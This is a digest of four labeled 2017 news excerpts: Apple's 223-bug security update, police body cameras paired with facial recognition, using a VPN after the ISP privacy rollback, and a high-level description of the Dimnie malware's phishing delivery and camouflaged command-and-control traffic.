source:  threatpost.com

Apple fixed hundreds of bugs, 223 to be exact, across a slate of products including macOS Sierra, iOS, Safari, watchOS, and tvOS on Monday.

More than a quarter of the bugs, 40 in macOS Sierra, and 30 in iOS, could lead to arbitrary code execution – in some instances with root privileges, Apple warned.

The lion’s share of the vulnerabilities patched Monday, 127 in total, were fixed in the latest version of macOS Sierra, 10.12.4.

Ian Beer, a researcher with Google’s Project Zero group, uncovered seven of the vulnerabilities, including six that could have enabled an application to execute arbitrary code with kernel privileges. South Korean hacker Jung Hoon Lee, perhaps better known in hacking circles by his handle Lokihardt, is credited for finding two vulnerabilities as well – one in the kernel and one in WebKit. Lokihardt, a veteran of Pwn2Own competitions, joined Project Zero in December 2016.

The update also fixed a memory corruption issue that stemmed from how certificates were parsed. The bug, technically a use-after-free vulnerability, existed in the X.509 certificate validation functionality present in macOS and iOS. According to Aleksandar Nikolic, a researcher with Cisco’s Talos Security Intelligence and Research Group who found the bug, an attacker with a specially crafted X.509 certificate could have triggered it and carried out remote code execution. Nikolic claims a victim could either be tricked several ways – a user could get served a malicious cert via a website, by the Mail app connecting to a mail server that contains a malicious cert, or by opening a malicious cert to import into the keychain.

Talos claims it verified the most recent versions of macOS Sierra, 10.12.3, and iOS, 10.2.1, are vulnerable. Older versions of the operating systems are likely affected too, the firm claims.

Per usual, a large chunk of vulnerabilities in the OS were addressed by updating open source software implementations that macOS uses to the next version. Forty-one different bugs were fixed by updating tcpdump, a free packet analyzer, to version 4.9.0. 11 vulnerabilities were fixed by updating LibreSSL and PHP to versions 2.4.25 and 5.6.30 respectively. Four vulnerabilities were addressed by updating OpenSSH in macOS to version 7.4.

 

source:  defenseone.com

Combined with policy body cameras, it could redefine the nature of public spaces.

Police body cameras are widely seen as a way to improve law enforcement’s transparency with the public. But when mixed with police use of facial-recognition tools, the prospect of continual surveillance comes with big risks to privacy.

Facial-recognition technology combined with policy body cameras could “redefine the nature of public spaces,” Alvaro Bedoya, executive director of the Georgetown Law Center on Privacy & Technology, told the House oversight committee at a hearing March 22. It’s not a distant reality and it threatens civil liberties, he warned.

Technologists already have tools, and are developing more, that allow police to recognize people in real time. Of 38 manufacturers who make 66 different products, at least nine already have facial recognition technology capabilities or have made accommodations to build it in, according to a 2016 Johns Hopkins University report, created for the Justice Department, on the body-worn camera market.

Rather than looking back retrospectively at footage, cops with cameras and this technology can scan people as they pass and assess who they are, where they’ve been, and whether they are wanted for anything from murder to a traffic ticket, with the aid of algorithms. This, say legal experts, puts everyone—even law-abiding citizens—under perpetual surveillance and suspicion.

2016 report from the Georgetown Law Center on Privacy & Technology notes the free speech and privacy concerns this raises, and warns that citizens will become unwitting participants in an unending police procedure. From the report:

There is a knock on your door. It’s the police. There was a robbery in your neighborhood. They have a suspect in custody and an eyewitness. But they need your help: Will you come down to the station to stand in the line-up? Most people would probably answer “no.”

The researchers note that 16 states already let the FBI use face-recognition technology to compare suspected criminals to their driver’s license or other ID photos, creating an algorithmically determined virtual lineup of residents. And state and local police departments are building their own face recognition systems, too.

“Face recognition is a powerful technology that requires strict oversight. But those controls by and large don’t exist today,” said Clare Garvie, one of the report’s authors. “With only a few exceptions, there are no laws governing police use of the technology, no standards ensuring its accuracy, and no systems checking for bias. It’s a wild west.”

The interest in this technology extends internationally. NTechLab, which is located in Cyprus and in Russia, and which claims to make the world’s most accurate facial-recognition technology, has pilot projects in 20 countries, including the U.S., China and Turkey. The company says it uses machine learning to “build software that makes the world a safer and more comfortable place.”

 

source: wired.com

The House of Representatives voted to reverse regulations that would have stopped internet service providers from selling your web-browsing data without your explicit consent. It’s a disappointing setback for anyone who doesn’t want big telecoms profiting off of their personal data. So what to do? Try a Virtual Private Network. It won’t fix all your privacy problems, but a VPN’s a decent start.

In case you’re not familiar, a VPN is a private, controlled network that connects you to the internet at large. Your connection with your VPN’s server is encrypted, and if you browse the wider internet through this smaller, secure network, it’s difficult for anyone to eavesdrop on what you’re doing from the outside. VPNs also take your ISP out of the loop on your browsing habits, because they just see endless logs of you connecting to the VPN server.

There are more aggressive ways of hiding your browsing and more effective ways of achieving anonymity. The most obvious option is to use the Tor anonymous browser. But attempting to use Tor for all browsing and communication is difficult and complicated. It’s not impossible, but it’s probably not the easy, broad solution you’re looking for day to day to protect against an ISP’s prying eyes.

Trust Factors

VPNs can shield you from your big bad cable company, but they are also in a position to potentially do all the same things you were worried about in the first place—they can access and track all of your activities and movements online. So for a VPN to be any more private than an ISP, the company that offers the VPN needs to be trustworthy. That’s a very tricky thing to confirm.

 

source: securityweek.com

Stealthy command and control methods allowed a newly discovered malware family to fly under the radar for more than three years, Palo Alto Networks security researchers reveal.

Dubbed Dimnie, the threat was discovered in mid-January 2017, when it was targeting open-source developers via phishing emails. An attached malicious .doc file contained embedded macro code that executed a PowerShell command to download and execute a file.

The first samples pertaining to this malware family dated back to early 2014, but the use of stealthy command and control (C&C) methods, combined with a Russian-focused target base helped the threat remain unnoticed until this year. Dimnie, which attempted a global reach with its January 2017 campaign, is capable of downloading additional malware and stealing information from compromised systems.

The malware has a modular design and can hinder analysis by injecting each of its modules into the memory of core Windows processes. What’s more, the malware appears to have undergone a series of changes over time, Palo Alto Networks reveals.

Looking at the threat’s communication with the C&C infrastructure, the security researchers discovered that it uses HTTP Proxy requests to the Google PageRank service, which hasn’t been available to the public since last year. Because the absolute URI in the HTTP request is for a non-existent service, the server isn’t acting as a proxy, and the seemingly RFC compliant request is merely camouflage.

The HTTP traffic also reveals that the malware uses an AES key to decrypt payloads (which have been previously encrypted using AES 256 in ECB mode). The server’s reply also contains a Cookie value, which is a 48 byte, base64 encoded, AES 256 ECB encrypted series of UINT32 values pertaining to the payload. The malware uses the Cookie parameter to verify the payload’s integrity.